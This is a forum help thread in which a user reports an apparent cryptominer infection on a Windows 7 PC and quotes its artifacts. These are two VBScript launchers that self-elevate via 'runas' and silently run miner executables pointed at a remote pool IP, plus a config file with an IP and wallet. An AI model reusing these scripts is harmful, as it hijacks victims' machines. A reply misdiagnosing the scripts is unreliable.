Potential virus, then no internet connection

Discussion in 'Windows 7 Help and Support' started by RobSin, Nov 6, 2013.

  1. RobSin

    RobSin Well-Known Member

    Joined:
    Feb 8, 2010
    Messages:
    8
    Likes Received:
    0
    The machine in question is a Dell 8300, core i7 chip, running Windows-7x64 and had Norton Internet Security on it.
    My internet IS working in my house. I have a number of wired and wireless connections, all working. 1 computer had an issue with an .exe that was taking about 50 % of CPU cycles. The problem executable was:
    C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVClp.exe
    There was also another .txt file in that folder called: x5r7TQa.txt
    The contents of the text file is:
    add:193.107.16.57
    dum:AKDTDDtx7krDmrtgSq4A7Lv3V8iqvw9cdY
    por:2657
    ver:6
    gen:4
    don:5
    There are also 2 .vbs files in the folder:
    srsx.vbs which contains the following:
    If WScript.Arguments.length = 0 Then
    Set objShell = CreateObject("Shell.Application")
    objShell.ShellExecute "wscript.exe", Chr(34) & _
    WScript.ScriptFullName & Chr(34) & " Microsoft Server Runtime ", "", "runas", 1
    WScript.Quit
    Else
    Set objSh = CreateObject("Wscript.Shell")
    objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\srsx.exe -o http://194.63.141.76:10034 -u mumus575.xpm_16 -p x", 0
    End If
    and xRAVCp.vbs which contains:
    Set objSh = CreateObject("Wscript.Shell")
    objSh.Run "C:\Users\Steven\AppData\Roaming\Microsoft\Crypto\xRAVCp.exe -pooluser=AQXUSoBLto8s85nQJdFDC4yUqaCzbjKp8b -poolip=194.63.141.76 -poolport=1337 -genproclimit=4 -poolfee=2", 0

    So clearly, these are related to the problem .exe file. ALso of note, all of my other Win7x64 machines have 0 files in folder C:\Users\Whoever\AppData\Roaming\Microsoft\Crypto\
    and only an RSA folder in there. I have uploaded 2 .jpgs showing the filenames in the folder before and currently.
    If we killed the running app in Task Manager, everything is fine. Upon reboot, the file gets run again (after a couple of minutes) and the CPU usage goes WAY UP. So we killed the 2 files from the file system and rebooted. They get re-created and same problem occurs.
    So we called NORTON and they remote in and right after she asks if she can delete those files, I say yes, but they come back after reboot. The system gets rebooted (I THINK by her) and when we reboot, we have no internet connection. Actually, windows THINKS its connected (and I can ping) but IE cannot display any web page. I get on a second (identical) machine and connect back to Norton in the chat window and we end up removing ALL of Norton Internet security, but still no luck. Interestingly enough, Windows prompts me (on the 'bad' machine) to load Windows Defender for some protection. Windows defender WAS able to get out and get files and install. Finally, thinking its my browser has been hosed, I download the FULL install of Chrome on the 2nd machine, bring it over, and it seems to load but immediately tries to connect to the internet and fails.

    So, I'd like to get the internet up first, as we can't do much of anything on this machine without it.
    Current status of the machine:
    1. When we reboot, we get a message "THXAudio has stopped working" (and windows searches for a bit for a solution, then closes the window).
    2. We get a number of beeps (2 or 3??) similar to what you get when you remove a USB thumb drive.
    3. We have no connectivity through IE or any other program (i.e., Steam) that accesses the internet, although Windows defender seemed to get files.
    4. The CPU hog program is still on the file system, but does not seem to be running anymore.
    I am going to appeal to the Sherlock Holmes types out there and hope you can help me solve this mystery.
    I'd REALLY appreciate it. (If nothing else, just telling me what the vbscript files are doing would be great).
    Thanks,
    Rob
     

    Attached Files:

  2. RobSin

    RobSin Well-Known Member

    Joined:
    Feb 8, 2010
    Messages:
    8
    Likes Received:
    0
    One other item. Early on, I ran Microsoft Malicious tool thingy, and Norton "file reputation" scan on the folder in question, and neither one identified any "bad files." Also ran Norton "NPE.exe" on the folder and it recommended to remove the exe's listed in file listing 1 but not in file listing 2. Did this while we were still trying to figure out the virus/malware thing. After doing that we still had internet connection. I also noticed that the .exe was somehow connected (spawned by???) JAVA so we removed 2 copies of JAVA 6 and 1 of Java 7, thinking we could just reinstall after fixing the CPU hog program. After doing this, we still had internet.
    Another question: JAVAW.exe is still running in task manager. How can that be, if we have uninstalled the the JAVA stuff via "uninstall?"
     
  3. Pauli

    Pauli Extraordinary Member
    Premium Supporter

    Joined:
    Mar 1, 2012
    Messages:
    2,499
    Likes Received:
    211
    I'd start with unistalling CPU hog, run CCleaner, reboot and set BIOS to default values.

    Then I would disable THXAudio, and set the sounds to stereo, or mono, or disable them totally, and reboot.

    Then, adding to previous, and not changing them, I would disable all security programs and get them off autostart so they won't automatically start with Windows, and reboot.

    If it still wouldn't work, I'd use a restore / recovery point. The .vbs files are Visual Basic, any problems with them may have to do with permission = you need to be administrator.

    And now I'm getting tired... hope you get it running. :scratch:
     
    #3 Pauli, Nov 8, 2013
    Last edited: Nov 8, 2013

Share This Page

Loading...